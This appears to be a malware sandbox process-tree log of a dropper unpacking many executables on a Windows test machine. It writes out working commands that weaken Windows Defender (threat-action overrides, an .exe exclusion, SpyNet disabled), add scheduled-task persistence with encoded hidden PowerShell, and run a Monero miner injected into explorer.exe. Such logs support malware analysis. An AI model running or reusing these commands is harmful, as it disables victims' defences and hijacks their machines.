C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gfCVtwSxr" /SC once /ST 01:33:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bOoGaaDxESFbryPOAb" /SC once /ST 03:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\hBgiVyG.exe\" tt /site_id 394347 /S" /V1 /F9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\0JyVYnsjptsTZr1Bg5IXtXCy.exe"C:\Users\Admin\Documents\0JyVYnsjptsTZr1Bg5IXtXCy.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun19262b9e49ad.exeSun19262b9e49ad.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 16646⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun193fda712d9f1.exeSun193fda712d9f1.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun19e4ade31b2a.exeSun19e4ade31b2a.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun191101c1aaa.exeSun191101c1aaa.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6084 -s 17248⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4688 -s 6048⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5212 -s 2768⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5316 -s 17168⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-T3SE1.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-T3SE1.tmp\setup_2.tmp" /SL5="$10262,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-1J1VM.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-1J1VM.tmp\setup_2.tmp" /SL5="$20262,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun198361825f4.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun198361825f4.exeSun198361825f4.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun19eb40faaaa9.exeSun19eb40faaaa9.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 2406⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun19de8ff4b6aefeb8.exeSun19de8ff4b6aefeb8.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3572 -s 2606⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun1905815e51282417.exeSun1905815e51282417.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun1966fb31dd5a07.exeSun1966fb31dd5a07.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-P9PB6.tmp\Sun1966fb31dd5a07.tmp"C:\Users\Admin\AppData\Local\Temp\is-P9PB6.tmp\Sun1966fb31dd5a07.tmp" /SL5="$30134,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun1966fb31dd5a07.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-6AN6K.tmp\Ze2ro.exe"C:\Users\Admin\AppData\Local\Temp\is-6AN6K.tmp\Ze2ro.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Windows Mail\FMDYOFITOC\ultramediaburner.exe"C:\Program Files\Windows Mail\FMDYOFITOC\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-S517Q.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-S517Q.tmp\ultramediaburner.tmp" /SL5="$20274,281924,62464,C:\Program Files\Windows Mail\FMDYOFITOC\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\8b-95f04-737-9f595-ebcc3e1f132e9\Leboberaeha.exe"C:\Users\Admin\AppData\Local\Temp\8b-95f04-737-9f595-ebcc3e1f132e9\Leboberaeha.exe"8⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ff860e046f8,0x7ff860e04708,0x7ff860e0471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5684 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5684 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2792 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1288 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5284 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7032 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7040 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7008 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7120 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=6560 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5360 /prefetch:810⤵
-
